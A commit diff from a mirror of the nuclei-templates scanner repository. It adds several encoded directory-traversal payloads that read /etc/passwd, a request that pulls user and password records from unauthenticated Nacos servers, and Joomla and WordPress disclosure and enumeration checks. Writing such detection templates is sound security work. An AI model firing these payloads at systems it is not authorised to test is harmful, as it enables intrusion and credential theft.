daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into dell-idrac

patch-1
PD-Team 2021-02-26 18:43:56 +05:30 committed by GitHub
parent 367a1117f6 4ea036fbe2
commit 3dbaf7b7fa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
10 changed files with 127 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
README.md
View File

@ -45,6 +45,7 @@ An overview of the nuclei template directory including number of templates assoc
**63 directories, 609 files**.
</td>
</tr>
</table>

7
fuzzing/directory-traversal.yaml
View File

@ -24,6 +24,13 @@ requests:
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
matchers-condition: and
matchers:
- type: status

29
miscellaneous/joomla-htaccess.yaml Normal file
View File

@ -0,0 +1,29 @@
id: joomla-htaccess-file
info:
name: Joomla htaccess file disclosure
author: oppsec
severity: info
description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc...
requests:
- method: GET
path:
- "{{BaseURL}}/htaccess.txt"
matchers-condition: and
matchers:
- type: word
words:
- "# @package Joomla"
- "Open Source Matters. All rights reserved"
condition: and
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200

29
miscellaneous/joomla-manifest-file.yaml Normal file
View File

@ -0,0 +1,29 @@
id: joomla-manifest-file
info:
name: Joomla manifest file disclosure
author: oppsec
severity: info
description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths.
requests:
- method: GET
path:
- "{{BaseURL}}/administrator/manifests/files/joomla.xml"
matchers-condition: and
matchers:
- type: word
words:
- "admin@joomla.org"
- "www.joomla.org"
condition: and
- type: word
words:
- "application/xml"
part: header
- type: status
status:
- 200

10
misconfiguration/unauthenticated-airflow.yaml
View File

@ -14,9 +14,15 @@ requests:
matchers:
- type: word
words:
- Airflow - DAGs
- "Content-Type: text/html"
part: header
- type: word
words:
- "<title>Airflow - DAGs</title>"
part: body
condition: and
- type: status
status:
- 200
- 200

30
misconfiguration/unauthenticated-nacos-access.yaml
View File

@ -1,30 +1,34 @@
id: unauthenticated-nacos-access
info:
name: Unauthenticated Nacos access
author: taielab
name: Unauthenticated Nacos access v1.x
author: taielab & @pikpikcu
severity: critical
# References:
# - https://github.com/alibaba/nacos/issues/4593
issues: https://github.com/alibaba/nacos/issues/4593
requests:
- raw:
- |
GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
Host: {{Hostname}}
User-Agent: Nacos-Server
Content-Length: 2
- method: GET
path:
- "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
- "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
headers:
User-Agent: Nacos-Server
matchers-condition: and
matchers:
- type: word
words:
- "Content-Type: application/json"
part: header
- type: regex
regex:
- '"username":'
- '"password":'
- '"totalCount":'
condition: and
part: body
condition: and
- type: status
status:
- 200

3
vulnerabilities/wordpress/wordpress-user-enumeration.yaml
View File

@ -2,7 +2,7 @@ id: wordpress-user-enumeration
info:
name: Wordpress user enumeration
author: Manas_Harsh
author: Manas_Harsh & daffainfo
severity: info
tags: wordpress
@ -10,6 +10,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/users/"
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
matchers-condition: and
matchers:
- type: status

2
miscellaneous/wp-license.yaml → vulnerabilities/wordpress/wp-license-file.yaml
View File

@ -1,4 +1,4 @@
id: wp-license
id: wp-license-file
info:
name: WordPress license file disclosure

31
vulnerabilities/wordpress/wp-uploads-listing.yaml Normal file
View File

@ -0,0 +1,31 @@
id: wp-uploads-listing
info:
name: WordPress Upload Directory Listing Enable
author: yashgoti
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/"
- "{{BaseURL}}/wp-content/uploads/2015/"
- "{{BaseURL}}/wp-content/uploads/2016/"
- "{{BaseURL}}/wp-content/uploads/2017/"
- "{{BaseURL}}/wp-content/uploads/2018/"
- "{{BaseURL}}/wp-content/uploads/2019/"
- "{{BaseURL}}/wp-content/uploads/2020/"
- "{{BaseURL}}/wp-content/uploads/2021/"
- "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/"
matchers-condition: and
matchers:
- type: word
words:
- "Directory listing for"
- "Index of /"
- "[To Parent Directory]"
- "Directory: /"
- type: status
status:
- 200

2
workflows/wordpress-workflow.yaml
View File

@ -44,3 +44,5 @@ workflows:
- template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
- template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
- template: vulnerabilities/wordpress/wp-uploads-listing.yaml
- template: vulnerabilities/wordpress/wp-license-file.yaml